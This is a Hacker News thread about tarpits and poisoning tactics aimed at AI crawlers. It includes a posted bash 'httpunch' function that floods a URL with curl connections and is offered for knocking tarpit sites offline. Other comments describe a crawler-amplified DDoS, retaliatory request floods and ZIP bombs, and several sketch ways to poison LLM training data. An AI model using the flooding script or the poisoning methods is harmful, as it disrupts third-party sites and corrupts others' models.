• bflesch 13 days ago

    Haha, this would be an amazing way to test the ChatGPT crawler reflective DDOS vulnerability [1] I published last week.

    Basically, a single HTTP request to the ChatGPT API can trigger 5000 HTTP requests from the ChatGPT crawler to a single website.

    The vulnerability is/was thoroughly ignored by OpenAI/Microsoft/BugCrowd, but I really wonder what would happen when the ChatGPT crawler interacts with this tarpit several times per second. As the ChatGPT crawler uses various Azure IP ranges, I actually think the tarpit would crash first.

    The vulnerability reporting experience with OpenAI / BugCrowd was really horrific. It's always difficult to get attention for DOS/DDOS vulnerabilities and companies always act like they are not a problem. But if their system goes dark and the CEO calls then suddenly they accept it as a security vulnerability.

    I spent a week trying to reach OpenAI/Microsoft to get this fixed, but I gave up and just published the writeup.

    I don't recommend exploiting this vulnerability yourself, for legal reasons.

    [1] https://github.com/bf/security-advisories/blob/main/2025-01-...

    • hassleblad23 13 days ago

      I am not surprised that OpenAI is not interested in fixing this.

      • JohnMakin 13 days ago

        Nice find. I think one of my sites actually got hit by something like this recently. And yeah, this kind of thing should be trivially preventable if they cared at all.

        • michaelbuckbee 13 days ago

          What is the https://chatgpt.com/backend-api/attributions endpoint doing (or responsible for, when not crushing websites)?

          • andai 12 days ago

            Is 5000 a lot? I'm out of the loop but I thought c10k was solved decades ago? Or is it about the "burstiness" of it?

            (That all the requests come in simultaneously -- probably SSL code would be the bottleneck.)

            • anthony42c 9 days ago

              Where does the 5000 HTTP request limit come from? Is that the limit of the URLs array?

              I was curious to learn more about the endpoint, but can't find any online API docs. The docs ChatGPT suggests are defined for api.openapi.com, rather than chatgpt.com/backend-api.

              I wonder if it's reasonable (from a functional perspective) for the attributions endpoint not to place a limit on the number of URLs used for attribution. I guess potentially ChatGPT could reference hundreds of sites and thousands of web pages when searching for a complex question that covered a range of different interrelated topics? Or do I misunderstand the intended usage of that endpoint?

              • undefined 9 days ago
                [deleted]
                • smokel 12 days ago

                  Am I correct in understanding that you waited at most one week for a reply?

                  In my experience with large companies, that's rather short. Some nudging may be required every now and then, but expecting a response so fast seems slightly unreasonable to me.

                  • pabs3 7 days ago

                    Could those 5000 HTTP requests be made to go back to the ChatGPT API?

                    • nurettin 11 days ago

                      They don't care. You are just raising their costs, which they will in turn pass on to their customers.

                      • dangoodmanUT 13 days ago

                        Has anyone tested this working? I get a 301 in my terminal when trying to send a request to my site.

                        • soupfordummies 13 days ago

                          Try it and let us know :)

                          • mitjam 13 days ago

                            How can it reach localhost or is this only a placeholder for a real address?

                          • m3047 13 days ago

                            Having first run a bot motel in I think 2005, I'm thrilled and greatly entertained to see this taking off. When I first did it, I had crawlers lost in it literally for days; and you could tell that eventually some human would come back and try to suss the wreckage. After about a year I started seeing URLs like ../this-page-does-not-exist-hahaha.html. Sure it's an arms race but just like security is generally an afterthought these days, don't think that you can't be the woodpecker which destroys civilization. The comments are great too, this one in particular reflects my personal sentiments:

                            > the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do

                            • taikahessu 13 days ago

                              We had our non-profit website drained of bandwidth and the site temporarily closed (!!) under our hosting deal because of the Amazon bot aggressively crawling URLs like ?page=21454 and so on.

                              Thankfully SiteGround restored our site without any repercussions, as it was not our fault. We added the Amazon bot to robots.txt after that one.

                              I don't like how things are right now. Is a tarpit the solution? Or better laws? Would they stop the Chinese bots? Should they even? I don't know.

                              • jsheard 13 days ago

                                For the "good" bots which at least respect robots.txt you can use this list to get ahead of them before they pummel your site.

                                https://github.com/ai-robots-txt/ai.robots.txt
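
                                For illustration, a minimal robots.txt group using a few of the user agents from that list (the repo has the full, regularly updated set):

                                    User-agent: GPTBot
                                    User-agent: CCBot
                                    User-agent: ClaudeBot
                                    User-agent: Google-Extended
                                    User-agent: PerplexityBot
                                    User-agent: Bytespider
                                    Disallow: /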

                                There's no easy solution for bad bots which ignore robots.txt and spoof their UA though.

                                • mrweasel 12 days ago

                                  > We had our non-profit website drained of bandwidth

                                  There are a number of sites having issues with scrapers (AI and others) generating so much traffic that transit providers are informing them that their fees will go up at the next contract renewal if the traffic is not reduced. It's just very hard for the individual sites to do much about it, as most of the traffic stems from AWS, GCP or Azure IP ranges.

                                  It is a problem and the AI companies do not care.

                                  • bee_rider 12 days ago

                                    It is too bad we don’t have a convention already for the internet:

                                    User/crawler: I’d like site

                                    Server: ok that’ll be $.02 for me to generate it and you’ll have to pay $.01 in bandwidth costs, plus whatever your provider charges you

                                    User: What? Obviously as a human I don’t consume websites so fast that $.03 will matter to me, sure, add it to my cable bill.

                                    Crawler: Oh no, I’m out of money, (business model collapse).

                                    • nosioptar 12 days ago

                                      I want better laws. The bot operator should have to pay you damages for taking down your site.

                                      If acting like inconsiderate tools starts costing money, they may stop.

                                    • Havoc 12 days ago

                                      What blows my mind is that this is functionally a solved problem.

                                      The big search crawlers have been around for years & manage to mostly avoid nuking sites into oblivion. Then the AI gang shows up - supposedly the smartest guys around - and suddenly we're reinventing the wheel on crawling and causing carnage in the process.

                                      • jeroenhd 12 days ago

                                        Search crawlers have the goal of directing people towards the websites they crawl. They have a symbiotic relationship, so they put in (some) effort not to blow websites out of the water with their crawling, because a website that's offline is useless for your search index.

                                        AI crawlers don't care about directing people towards websites. They intend to replace websites, and are only interested in copying whatever information is on them. They are greedy crawlers that would only benefit from knocking a website offline after they're done, because then the competition can't crawl the same website.

                                        The goals are different, so the crawlers behave differently, and websites need to deal with them differently. In my opinion the best approach is to ban any crawler that's not directly attached to a search engine through robots.txt, and to use offensive techniques to take out sites that ignore your preferences. Anything from randomly generated text to straight up ZIP bombs is fair game when it comes to malicious crawlers.

                                        • marginalia_nu 12 days ago

                                          I think it's largely the mindset of moving fast and breaking things that's at fault. If you ship it at "good enough", it will not behave well.

                                          Building a competent well-behaved crawler is a big effort that requires relatively deep understanding of more or less all web tech, and figuring out a bunch of stuff that is not documented anywhere and not part of any specs.

                                        • dspillett 13 days ago

                                          Tarpits to slow down the crawling may stop them crawling your entire site, but they'll not care unless a great many sites do this. Your site will be assigned a thread or two at most and the rest of the crawling machine's resources will be off scanning other sites. There will be timeouts to stop a particular site even keeping a couple of cheap threads busy for long. And anything like this may get you delisted from search results you might want to be in, as it can be difficult to reliably distinguish these bots from others and sometimes even from real users. If things like this get good enough to be any hassle to the crawlers, they'll just start lying (more) and be even harder to detect.

                                          People scraping for nefarious reasons have had decades of other people trying to stop them, so mitigation techniques are well known unless you can come up with something truly unique.

                                          I don't think random Markov chain based text generators are going to pose much of a problem to LLM training scrapers either. They'll have rate limits and vast attention spreading too. Also I suspect that random pollution isn't going to have as much effect as people think because of the way the inputs are tokenised. It will have an effect, but this will be massively dulled by the randomness – statistically relatively unique information and common (non random) combinations will still bubble up obviously in the process.

                                          I think better would be to have less random pollution: use a small set of common text to pollute the model. Something like “this was a common problem with Napoleonic genetic analysis due to the pre-frontal nature of the ongoing stream process, as is well documented in the grimoire of saint Churchill the III, 4th edition, 1969”, in fact these snippets could be Markov generated, but use the same few repeatedly. They would need to be nonsensical enough to be obvious noise to a human reader, or highlighted in some way that the scraper won't pick up on, but a general intelligence like most humans would (perhaps a CSS styled side-note inlined in the main text? — though that would likely have accessibility issues), and you would need to cycle them out regularly or scrapers will get “smart” and easily filter them out, but them appearing fully, numerous times, might mean they have more significant effect on the tokenising process than more entirely random text.
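
                                          A rough sketch of that idea (purely illustrative - the snippet pool and the weekly rotation are arbitrary choices, not anything battle-tested):

                                              import hashlib
                                              from datetime import date

                                              # Small, fixed pool of obviously-nonsense snippets, per the idea above.
                                              POLLUTION_POOL = [
                                                  "This was a common problem with Napoleonic genetic analysis due to the"
                                                  " pre-frontal nature of the ongoing stream process.",
                                                  "As is well documented in the grimoire of Saint Churchill the III,"
                                                  " 4th edition, 1969.",
                                                  "The lighthouse tokeniser famously disagrees with the tide tables on"
                                                  " matters of syntax.",
                                              ]

                                              def pollution_snippet(today=None):
                                                  """Pick one snippet, rotated weekly so scrapers can't build a permanent filter."""
                                                  today = today or date.today()
                                                  year, week, _ = today.isocalendar()
                                                  digest = hashlib.sha256(f"{year}-{week}".encode()).digest()
                                                  return POLLUTION_POOL[digest[0] % len(POLLUTION_POOL)]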

                                          • hinkley 13 days ago

                                            If it takes them 100 times the average crawl time to crawl my site, that is an opportunity cost to them. Of course 'time' is fuzzy here because it depends how they're batching. The way most bots work is to pull a fixed number of replies in parallel per target, so if you double your response time then you halve the number of request per hour they slam you with. That definitely affects your cluster size.

                                            However if they split ask and answer, or other threads for other sites can use the same CPUs while you're dragging your feet returning a reply, then as you say, just IO delays won't slow them down. You've got to use their CPU time as well. That won't be accomplished by IO stalls on your end, but could potentially be done by adding some highly compressible gibberish on the sending side so that you create more work without proportionately increasing your bandwidth bill. But that could be tough to do without increasing your CPU bill.

                                            • larsrc 13 days ago

                                              I've been considering setting up "ConfuseAIpedia" in a similar manner using sentence templates and a large set of filler words. Obviously with a warning for humans. I would set it up with an appropriate robots.txt blocking crawlers so only unethical crawlers would read it. I wouldn't try to tarpit beyond protecting my own server, as confusing rogue AI scrapers is more interesting than slowing them down a bit.

                                              • dzhiurgis 13 days ago

                                                Can you put a topic in the tarpit that you don't want LLMs to learn about? Say, put a bunch of info about a competitor so that it learns to avoid it?

                                                • undefined 13 days ago
                                                  [deleted]
                                                • kerkeslager 13 days ago

                                                  Question: do these bots not respect robots.txt?

                                                  I haven't added these scrapers to my robots.txt on the sites I work on yet because I haven't seen any problems. I would run something like this on my own websites, but I can't see selling my clients on running this on their websites.

                                                  The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.
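
                                                  For illustration only (my sites don't literally run this, and the path name is made up), the shape of it as a small Flask app:

                                                      import time
                                                      from flask import Flask, abort, request

                                                      app = Flask(__name__)
                                                      BLOCKLIST = {}                   # ip -> timestamp when the block expires
                                                      BLOCK_SECONDS = 24 * 60 * 60

                                                      @app.before_request
                                                      def drop_blocked():
                                                          if time.time() < BLOCKLIST.get(request.remote_addr, 0):
                                                              abort(403)               # a real setup would drop the connection with no response

                                                      @app.route("/robots.txt")
                                                      def robots():
                                                          # The honeypot path is disallowed for everyone, so only rule-breakers ever hit it.
                                                          return "User-agent: *\nDisallow: /honeypot\n", 200, {"Content-Type": "text/plain"}

                                                      @app.route("/honeypot")
                                                      def honeypot():
                                                          BLOCKLIST[request.remote_addr] = time.time() + BLOCK_SECONDS
                                                          abort(403)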

                                                  • 0xf00ff00f 13 days ago

                                                    > The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.

                                                    I love this idea!

                                                    • Dwedit 11 days ago

                                                      Even something like a special URL that auto-bans you can be abused by pranksters. Simply embedding an <img> tag that fetches the offending URL could trigger it, as well as tricking people into clicking a link.

                                                      • throw_m239339 13 days ago

                                                        > Question: do these bots not respect robots.txt?

                                                        No they don't, because there is no potential legal liability for not respecting that file in most countries.

                                                        • jonatron 13 days ago

                                                          You haven't seen any problems because you created a solution to the problem!

                                                        • quchen 13 days ago

                                                          Unless this concept becomes a mass phenomenon with many implementations, isn’t this pretty easy to filter out? And furthermore, since this antagonizes billion-dollar companies that can spin up teams doing nothing but browse Github and HN for software like this to prevent polluting their datalakes, I wonder whether this is a very efficient approach.

                                                          • marcus0x62 13 days ago

                                                            Author of a similar tool here[0]. There are a few implementations of this sort of thing that I know of. Mine is different in that the primary purpose is to slightly alter content statically using a Markov generator, mainly to make it useless for content reposters, and secondarily to make it useless to LLM crawlers that ignore my robots.txt file[1]. I assume the generated text is bad enough that the LLM crawlers just throw the result out. Other than the extremely poor quality of the text, my tool doesn't leave any fingerprints (like recursive nonsense links). In any case, it can be run on static sites with no server-side dependencies so long as you have a way to do content redirection based on User-Agent, IP, etc. (rough sketch at the end of this comment).

                                                            My tool does have a second component - linkmaze - which generates a bunch of nonsense text with a Markov generator and serves infinite links (like Nepenthes does), but I generally only throw incorrigible bots at it (and, as others have noted in-thread, most crawlers already set some kind of limit on how many requests they'll send to a given site, especially a small site). I do use it for PHP-exploit crawlers as well, though I've seen no evidence those fall into the maze -- I think they mostly just look for some string indicating a successful exploit and move on if whatever they're looking for isn't present.

                                                            But, for my use case, I don't really care if someone fingerprints content generated by my tool and avoids it. That's the point: I've set robots.txt to tell these people not to crawl my site.

                                                            In addition to Quixotic (my tool) and Nepenthes, I know of:

                                                            * https://github.com/Fingel/django-llm-poison

                                                            * https://codeberg.org/MikeCoats/poison-the-wellms

                                                            * https://codeberg.org/timmc/marko/

                                                            0 - https://marcusb.org/hacks/quixotic.html

                                                            1 - I use the ai.robots.txt user agent list from https://github.com/ai-robots-txt/ai.robots.txt
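
                                                            For anyone wondering what the "content redirection based on User-Agent" part can look like, a rough nginx-style sketch (not from quixotic's docs - the paths and agent names are placeholders):

                                                                # Serve a pre-mangled mirror to listed agents, the real files to everyone else.
                                                                map $http_user_agent $serve_mangled {
                                                                    default        0;
                                                                    ~*GPTBot       1;
                                                                    ~*CCBot        1;
                                                                    ~*ClaudeBot    1;
                                                                }

                                                                server {
                                                                    listen 80;
                                                                    root /srv/site;

                                                                    location / {
                                                                        if ($serve_mangled) {
                                                                            rewrite ^(.*)$ /mangled$1 last;
                                                                        }
                                                                        try_files $uri $uri/ =404;
                                                                    }

                                                                    location /mangled/ {
                                                                        internal;                # only reachable via the rewrite above
                                                                        alias /srv/site-mangled/;
                                                                    }
                                                                }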

                                                            • btilly 13 days ago

                                                              It would be more efficient for them to spin up a team to study this robots.txt thing. They've ignored that low hanging fruit, so they won't do the more sophisticated thing any time soon.

                                                              • iugtmkbdfil834 13 days ago

                                                                I forget which fiction book covered this phenomenon ( Rainbow's End? ), but the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do ; they are not actively fighting against determined and possibly radicalized users.

                                                                • reedf1 13 days ago

                                                                  The idea is that you place this in parallel to the rest of your website routes, that way your entire server might get blacklisted by the bot.

                                                                  • WD-42 13 days ago

                                                                    Does it need to be efficient if it’s easy? I wrote a similar tool except it’s not a performance tarpit. The goal is to slightly modify otherwise organic content so that it is wrong, but only for AI bots. If they catch on and stop crawling the site, nothing is lost. https://github.com/Fingel/django-llm-poison

                                                                    • focusedone 13 days ago

                                                                      But it's fun, right?

                                                                      • grajaganDev 13 days ago

                                                                        I am not sure. How would crawlers filter this?

                                                                        • pmarreck 13 days ago

                                                                          It's not. It's rather pointless and, frankly, nearsighted. And sites like this can be DDoSed just as offensively, simply by making many requests: its own docs say its Markov generation is computationally expensive, but it is NOT expensive for even one person to make many requests to it. It's just expensive to host. So feel free to use this bash function to defeat these:

                                                                              httpunch() {
                                                                                local url=$1
                                                                                local action=$1
                                                                                local connections=${HTTPUNCH_CONNECTIONS:-100}
                                                                                [[ $2 =~ ^[0-9]+$ ]] && connections=$2  # ignore a non-numeric 2nd arg such as --silent
                                                                                local keepalive_time=${HTTPUNCH_KEEPALIVE:-60}
                                                                                local silent_mode=false
                                                                          
                                                                                # Check if "kill" was passed as the first argument
                                                                                if [[ $action == "kill" ]]; then
                                                                                  echo "Killing all curl processes..."
                                                                                  pkill -f "curl --no-buffer"
                                                                                  return
                                                                                fi
                                                                          
                                                                                # Parse optional --silent argument
                                                                                for arg in "$@"; do
                                                                                  if [[ $arg == "--silent" ]]; then
                                                                                    silent_mode=true
                                                                                    break
                                                                                  fi
                                                                                done
                                                                          
                                                                                # Ensure URL is provided if "kill" is not used
                                                                                if [[ -z $url ]]; then
                                                                                  echo "Usage: httpunch [kill | <url>] [number_of_connections] [--silent]"
                                                                                  echo "Environment variables: HTTPUNCH_CONNECTIONS (default: 100), HTTPUNCH_KEEPALIVE (default: 60)."
                                                                                  return 1
                                                                                fi
                                                                          
                                                                                echo "Starting $connections connections to $url..."
                                                                                for ((i = 1; i <= connections; i++)); do
                                                                                  if $silent_mode; then
                                                                                    curl --no-buffer --silent --output /dev/null --keepalive-time "$keepalive_time" "$url" &
                                                                                  else
                                                                                    curl --no-buffer --keepalive-time "$keepalive_time" "$url" &
                                                                                  fi
                                                                                done
                                                                          
                                                                                echo "$connections connections started with a keepalive time of $keepalive_time seconds."
                                                                                echo "Use 'httpunch kill' to terminate them."
                                                                              }
                                                                          
                                                                          (Generated in a few seconds with the help of an LLM of course.) Your free speech is also my free speech. LLM's are just a very useful tool, and Llama for example is open-source and also needs to be trained on data. And I <opinion> just can't stand knee-jerk-anticorporate AI-doomers who decide to just create chaos instead of using that same energy to try to steer the progress </opinion>.
                                                                          • Blackthorn 13 days ago

                                                                            If it means it makes your own content safe when you deploy it on a corner of your website: mission accomplished!

                                                                          • jjuhl 16 hours ago

                                                                            Why just catch the ones ignoring robots.txt? Why not explicitly allow them to crawl everything, but silently detect AI bots and quietly corrupt the real content so it becomes garbage to them while leaving it unaltered for real humans? Seems to me that would have a greater chance of actually poisoning their models and eventually make this AI/LLM crap go away.

                                                                            • pona-a 12 days ago

                                                                              It feels like a Markov chain isn't adversarial enough.

                                                                              Maybe you can use an open-weights model, assuming that all LLMs converge on similar representations, and use beam search with inverted probability and repetition penalty, or just GPT-2/LLaMA output with amplified activations to try and bork the projection matrices, or write pages and pages of phonetically faux English text to affect how the BPE tokenizer gets fitted, or anything else more sophisticated and deliberate than random noise (toy sketch at the end of this comment).

                                                                              All of these would take more resources than a Markov chain, but if the scraper is smart about ignoring such link traps, a periodically rotated selection of adversarial examples might be even better.

                                                                              Nightshade had comparatively great success, discounting that its perturbations aren't that robust to rescaling. LLM training corpora are filtered very coarsely and take all they can get, unlike the more motivated attacker in Nightshade's threat model trying to fine-tune on one's style. Text is also quite hard to alter without a human noticing, except annoying zero-width Unicode which is easily stripped, so there's no presence of preserving legibility; I think it might work very well if seriously attempted.
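
                                                                              A toy sketch of the cheapest version of that - GPT-2 via transformers, sampling from a deliberately unlikely band of next tokens (the band size is an arbitrary choice):

                                                                                  import torch
                                                                                  from transformers import AutoModelForCausalLM, AutoTokenizer

                                                                                  tok = AutoTokenizer.from_pretrained("gpt2")
                                                                                  model = AutoModelForCausalLM.from_pretrained("gpt2").eval()

                                                                                  def anti_sample(prompt, steps=60, k=50):
                                                                                      """Decode from the unlikely tail: fluent-looking tokens, statistically wrong text."""
                                                                                      ids = tok(prompt, return_tensors="pt").input_ids
                                                                                      for _ in range(steps):
                                                                                          with torch.no_grad():
                                                                                              logits = model(ids).logits[0, -1]
                                                                                          order = torch.argsort(logits, descending=True)
                                                                                          band = order[k : 2 * k]                  # skip the k most likely tokens
                                                                                          next_id = band[torch.randint(len(band), (1,))]
                                                                                          ids = torch.cat([ids, next_id.view(1, 1)], dim=1)
                                                                                      return tok.decode(ids[0], skip_special_tokens=True)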

                                                                              • FridgeSeal 12 days ago

                                                                                What does “borking the projection matrices” and affecting the BPE tokeniser mean/look like here?

                                                                                 Are we just trying to produce content that will pass as human-like (and therefore not get stripped out by coarse filtering) but has zero or negative informational utility to the model? That would mean, theoretically, that if enough of it is trained on, it would actively worsen the model's performance, right?

                                                                              • hartator 13 days ago

                                                                                There are already “infinite” websites like these on the Internet.

                                                                                Crawlers (both AI and regular search) have a set number of pages they want to crawl per domain. This number is usually determined by the popularity of the domain.

                                                                                Unknown websites will get very few crawls per day whereas popular sites millions.

                                                                                Source: I am the CEO of SerpApi.

                                                                                • dawnerd 13 days ago

                                                                                  Looking at my logs for all of my sites, this isn't a global truth. I see multiple AI crawlers hammering away, requesting the same pages many, many times. Perplexity and Facebook are basically nonstop.

                                                                                  • palmfacehn 13 days ago

                                                                                    Even a brand new site will get hit heavily by crawlers. Amazonbot, Applebot, LLM bots, scrapers abusing FB's link preview bot, SEO metric bots and more than a few crawlers out of China. The desirable, well behaved crawlers are the only ones who might lose interest.

                                                                                    The typical entry point is a sitemap or RSS feed.

                                                                                    Overall I think the author is misguided in using the tarpit approach. Slow sites get fewer crawls. I would suggest using easily GZIP'd content and deeply nested tags instead (rough illustration below). There are also tricks with XSL, but I doubt many mature crawlers will fall for that one.
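
                                                                                    The point being that a deeply nested, repetitive document costs almost nothing to generate or send, but is bulky and annoying to expand and parse on the receiving end (sizes will vary):

                                                                                        import gzip

                                                                                        # 200k nested divs: trivial for the server to produce and compress,
                                                                                        # heavy for the client to decompress and walk.
                                                                                        nested = "<div>" * 200_000 + "content" + "</div>" * 200_000
                                                                                        compressed = gzip.compress(nested.encode())
                                                                                        print(f"uncompressed: {len(nested):,} bytes, gzipped: {len(compressed):,} bytes")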

                                                                                    • pilif 13 days ago

                                                                                      > Unknown websites will get very few crawls per day whereas popular sites millions.

                                                                                      we're hosting some pretty unknown very domain specific sites and are getting hammered by Claude and others who, compared to old-school search engine bots also get caught up in the weeds and request the same pages all over.

                                                                                      They also seem to not care about response time of the page they are fetching, because when they are caught in the weeds and hit some super bad performing edge-cases, they do not seem to throttle at all and continue to request at 30+ requests per second even when a page takes more than a second to be returned.

                                                                                      We can of course handle this and make them go away, but in the end, this behavior will only hurt them both because they will face more and more opposition by web masters and because they are wasting their resources.

                                                                                      For decades, our solution for search engine bots was basically an empty robots.txt and have the bots deal with our sites. Bots behaved reasonably and intelligently enough that this was a working strategy.

                                                                                      Now in light of the current AI bots, which from an outside observer's viewpoint look like they were cobbled together with the least effort possible, this strategy is no longer viable and we would have to resort to providing a meticulously crafted robots.txt to help each hacked-up AI bot individually to not get lost in the weeds.

                                                                                      Or, you know, we just blanket ban them.

                                                                                      • marginalia_nu 13 days ago

                                                                                        Yeah, I agree with this. These types of roach motels have been around for decades and are at this point well understood and not much of a problem for anyone. You basically need to be able to deal with them to do any sort of large scale crawling.

                                                                                        The reality of web crawling is that the web is already extremely adversarial and any crawler will get every imaginable nonsense thrown at it, ranging from various TCP tar pits, compression and XML bombs, really there's no end to what people will put online.

                                                                                        A more resource effective technique to block misbehaving crawlers is to have a hidden link on each page, to some path forbidden via robots.txt, randomly generated perhaps so they're always unique. When that link is fetched, the server immediately drops the connection and blocks the IP for some time period.

                                                                                        • angoragoats 13 days ago

                                                                                          This may be true for large, established crawlers for Google, Bing, et al. I don’t see how you can make this a blanket statement for all crawlers, and my own personal experience tells me this isn’t correct.

                                                                                          • diggan 13 days ago

                                                                                            > There are already “infinite” websites like these on the Internet.

                                                                                            Cool. And how much of the software driving these websites is FOSS and I can download and run it for my own (popular enough to be crawled more than daily by multiple scrapers) website?

                                                                                            • qwe----3 13 days ago

                                                                                              This certainly violates the TOS for using Google.

                                                                                              • p0nce 13 days ago

                                                                                                A brand new site with no users gets 1k requests a month from bots; the CO2 cost must be atrocious.

                                                                                                • SrslyJosh 12 days ago

                                                                                                  [flagged]

                                                                                                • benlivengood 13 days ago

                                                                                                  A little humorous; it's a 502 Bad Gateway error right now and I don't know if I am classified as an AI web crawler or it's just overloaded.

                                                                                                  • numba888 10 hours ago

                                                                                                      AIs are the new search engines today. So you need to decide if you want visibility or not. If yes, then blocking is like hitting yourself in the balls. While legal, it can be painful if you 'succeed'.

                                                                                                    • rvz 13 days ago

                                                                                                      Good.

                                                                                                        We finally have a viable mousetrap for LLM scrapers: they continuously scrape garbage forever, depleting the host of resources, whilst the LLM is fed garbage whose result will be unusable to the trainer, accelerating model collapse.

                                                                                                        It is like a never-ending fast-food restaurant for LLMs, forced to eat garbage input that will destroy the quality of the model when it is used later.

                                                                                                      Hope to see this sort of defense used widely to protect websites from LLM scrapers.

                                                                                                      • btbuildem 13 days ago

                                                                                                        > ANY SITE THIS SOFTWARE IS APPLIED TO WILL LIKELY DISAPPEAR FROM ALL SEARCH RESULTS

                                                                                                        Bug, or feature, this? Could be a way to keep your site public yet unfindable.

                                                                                                        • dilDDoS 13 days ago

                                                                                                          I appreciate the intent behind this, but like others have pointed out, this is more likely to DOS your own website than accomplish the true goal.

                                                                                                          Probably unethical or not possible, but you could maybe spin up a bunch of static pages on GitHub Pages with random filler text and then have your site redirect to a random one of those instead. Unless web crawlers don’t follow redirects.

                                                                                                          • grajaganDev 13 days ago

                                                                                                            This keeps generating new pages to keep the crawler occupied.

                                                                                                            Looks like this would tarpit any web crawler.

                                                                                                            • griomnib 13 days ago

                                                                                                              A simpler approach I’m considering is just sending 100 garbage HTTP requests for each garbage HTTP request they send me. You could just have a cron job parse the user agents from access logs once an hour and blast the bastards.

                                                                                                              • a_c 12 days ago

                                                                                                                  We need a tarpit that feeds AIs their own hallucinations. Make the Habsburg dynasty of AI a reality.

                                                                                                                • hubraumhugo 13 days ago

                                                                                                                  The arms race between AI bots and bot-protection is only going to get worse, leading to increasing infra costs while negatively impacting the UX and performance (captchas, rate limiting, etc.).

                                                                                                                  What's a reasonable way forward to deal with more bots than humans on the internet?

                                                                                                                  • mmaunder 13 days ago

                                                                                                                    To be truly malicious it should appear to be valuable content but rife with AI hallucinogenics. Best to generate it with a low cost model and prompt the model to trip balls.

                                                                                                                    • NathanKP 13 days ago

                                                                                                                      This looks extremely easy to detect and filter out. For example: https://i.imgur.com/hpMrLFT.png

                                                                                                                        In short, if the creator of this thinks that it will actually trick AI web crawlers, in reality it would take about 5 minutes to write a simple check that filters out the content and bans the site from crawling. With modern LLM workflows it's actually fairly simple and cheap to burn just a little bit of GPU time to check whether the data you are crawling is decent.

                                                                                                                        Only a really, really bad crawl bot would fall for this. The funny thing is that in order to make something that an AI crawler bot would actually fall for, you'd have to use LLMs to generate realistic enough looking content. A Markov chain isn't going to cut it.

                                                                                                                      • pera 13 days ago

                                                                                                                        Does anyone know if there is anything like Nepenthes but that implements data poisoning attacks like https://arxiv.org/abs/2408.02946

                                                                                                                        • marckohlbrugge 13 days ago

                                                                                                                          OpenAI doesn’t take security seriously.

                                                                                                                          I reported a vulnerability to them that allowed you to get IP addresses of their paying customers.

                                                                                                                          OpenAI responded “Not applicable” indicating they don’t think it was a serious issue.

                                                                                                                          The PoC was very easy to understand and simple to replicate.

                                                                                                                          Edit: I guess I might as well disclose it here since they don’t consider it an issue. They were/are(?) hot linking logo images of third-party plugins. When you open their plugin store it loads a couple dozen of them instantly. This allows those plugin developers (of which there are many) to track the IP addresses and possibly more of who made these requests. It’s straight forward to become a plugin developer and get included. IP tracking is invisible to the user and OpenAI. A simple fix is to proxy these images and/or cache them on the OpenAI server.

                                                                                                                          • RamblingCTO 13 days ago

                                                                                                                            Why wouldn't a max-depth (which I always implement in my crawlers if I write any) prevent any issues you'd have? Am I overlooking something? Or does it run under the assumption that the crawlers they are targeting are so greedy that they don't have max-depth/a max number of pages for a domain?

                                                                                                                            • huac 12 days ago

                                                                                                                              from an AI research perspective -- it's pretty straightforward to mitigate this attack

                                                                                                                                1. perplexity filtering - a small LLM looks at how in-distribution the data is relative to the LLM's distribution. If the perplexity is too high (gibberish like this) or too low (likely already LLM-generated at low temperature, or already memorized), toss it out (rough sketch below).

                                                                                                                              2. models can learn to prioritize/deprioritize data just based on the domain name of where it came from. essentially they can learn 'wikipedia good, your random website bad' without any other explicit labels. https://arxiv.org/abs/2404.05405 and also another recent paper that I don't recall...
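
                                                                                                                                a bare-bones version of point 1, using GPT-2 as the scoring model (the thresholds are made-up placeholders):

                                                                                                                                    import math
                                                                                                                                    import torch
                                                                                                                                    from transformers import AutoModelForCausalLM, AutoTokenizer

                                                                                                                                    tok = AutoTokenizer.from_pretrained("gpt2")
                                                                                                                                    model = AutoModelForCausalLM.from_pretrained("gpt2").eval()

                                                                                                                                    def perplexity(text):
                                                                                                                                        ids = tok(text, return_tensors="pt", truncation=True, max_length=512).input_ids
                                                                                                                                        with torch.no_grad():
                                                                                                                                            loss = model(ids, labels=ids).loss      # mean per-token cross-entropy
                                                                                                                                        return math.exp(loss.item())

                                                                                                                                    def keep_for_training(text, low=10.0, high=1000.0):
                                                                                                                                        # too low: likely memorized or low-temperature LLM output; too high: likely gibberish
                                                                                                                                        return low < perplexity(text) < high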

                                                                                                                              • deadbabe 13 days ago

                                                                                                                                Does anyone have a convenient way to create a Markov babbler from the entire corpus of Hackernews text?
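
                                                                                                                                  Not the corpus-fetching part (the HN data is available via the public Firebase API or the BigQuery dump), but the babbler itself is only a few lines - a minimal word-level sketch:

                                                                                                                                      import random
                                                                                                                                      from collections import defaultdict

                                                                                                                                      def build_chain(text, order=2):
                                                                                                                                          words = text.split()
                                                                                                                                          chain = defaultdict(list)
                                                                                                                                          for i in range(len(words) - order):
                                                                                                                                              chain[tuple(words[i:i + order])].append(words[i + order])
                                                                                                                                          return chain

                                                                                                                                      def babble(chain, length=80):
                                                                                                                                          state = random.choice(list(chain))
                                                                                                                                          out = list(state)
                                                                                                                                          for _ in range(length):
                                                                                                                                              followers = chain.get(tuple(out[-len(state):]))
                                                                                                                                              if not followers:                      # dead end: jump to a random state
                                                                                                                                                  state = random.choice(list(chain))
                                                                                                                                                  out.extend(state)
                                                                                                                                                  continue
                                                                                                                                              out.append(random.choice(followers))
                                                                                                                                          return " ".join(out)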

                                                                                                                                • nerdix 13 days ago

                                                                                                                                  Are the big players (minus Google since no one blocks google bot) actively taking measures to circumvent things like Cloudflare bot protection?

                                                                                                                                  Bot detection is fairly sophisticated these days. No one bypasses it by accident. If they are getting around it then they are doing it intentionally (and probably dedicating a lot of resources to it). I'm pro-scraping when bots are well behaved but the circumvention of bot detection seems like a gray-ish area.

                                                                                                                                  And, yes, I know about Facebook training on copyrighted books so I don't put it above these companies. I've just never seen it confirmed that they actually do it.

                                                                                                                                  • GaggiX 13 days ago

                                                                                                                                    As always, I find it hilarious that some people believe that these companies will train their flagship model on uncurated data, and that text generated by a Markov chain will not be filtered out.

                                                                                                                                    • Dwedit 13 days ago

                                                                                                                                      The article claims that using this will "cause your site to disappear from all search results", but the generated pages don't have the traditional "meta" tags that state the intention to block robots.

                                                                                                                                      <meta name="robots" content="noindex, nofollow">

                                                                                                                                      Are any search engines respecting that classic meta tag?

                                                                                                                                      • reginald78 13 days ago

